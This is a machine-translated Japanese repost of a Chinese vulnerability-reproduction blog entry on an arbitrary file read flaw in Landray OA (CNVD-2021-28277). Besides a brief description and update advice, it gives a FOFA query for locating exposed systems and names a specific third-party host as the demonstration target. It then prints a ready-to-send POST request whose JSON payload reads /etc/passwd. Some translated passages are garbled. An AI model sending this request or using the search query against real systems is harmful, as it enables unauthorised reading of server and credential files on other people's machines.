記事ディレクトリ
Lanling OA には任意のファイルを読み取る脆弱性が存在します
免責事項: この記事に記載されている関連技術を違法なテストに使用しないでください。この記事で提供される情報やツールの普及と使用によって引き起こされる直接的または間接的な結果と損失は、ユーザー自身が負担するものとします。記事の著者とは何の関係もありません。この記事は教育のみを目的としています。
1. Lanling OA の概要
WeChat 公式アカウント検索: 南峰脆弱性再現ライブラリ
この記事は、南峰脆弱性再現ライブラリ公式アカウントで最初に公開されました。
Lanling oaオフィスシステムは、オフィスコミュニケーションを瞬時に実現するoaオフィスツールです。
2. 脆弱性の説明
Lanling Software の正式名は Shenzhen Lanling Software Co., Ltd. で、2001 年に深セン科学技術園区に設立されました。Landray は、中国で有名な大規模プラットフォーム OA サービス プロバイダーであり、中国のナレッジ マネジメント ソリューションの大手プロバイダーであり、組織ナレッジ コンサルティング、ソフトウェアの研究開発、導入、および技術サービスを専門とする国家ハイテク企業です。最近、Landray-OA システムが爆発的に保存された任意のファイル読み取りの脆弱性とバックグラウンド攻撃
CVE 番号:
CNNVD 番号:
CNVD 番号: CNVD-2021-28277
3. バージョンに影響を与える
4. fofaクエリステートメント
app="Landray-OA システム"
5. 脆弱性の再発
脆弱性リンク: http://www.ynjd.cn:801/sys/ui/extend/varkind/custom.jsp
脆弱性データ パッケージ:
POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: www.ynjd.cn:801
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive
Content-Length: 42
Content-Type: application/x-www-form-urlencoded
var={"body":{"file":"file:///etc/passwd"}}
6.POC&EXP
パブリック アカウント Nanfeng Vulnerability Reproduction Library をフォローし、Vulnerability Reproduction 35 と返信して POC ツールのダウンロード アドレスを取得します。
7. 是正意見
Landray OA のシステムを使用してシステムを最新バージョンにアップデートすることをお勧めします。付録のアドレス: https://www.landray.com.cn/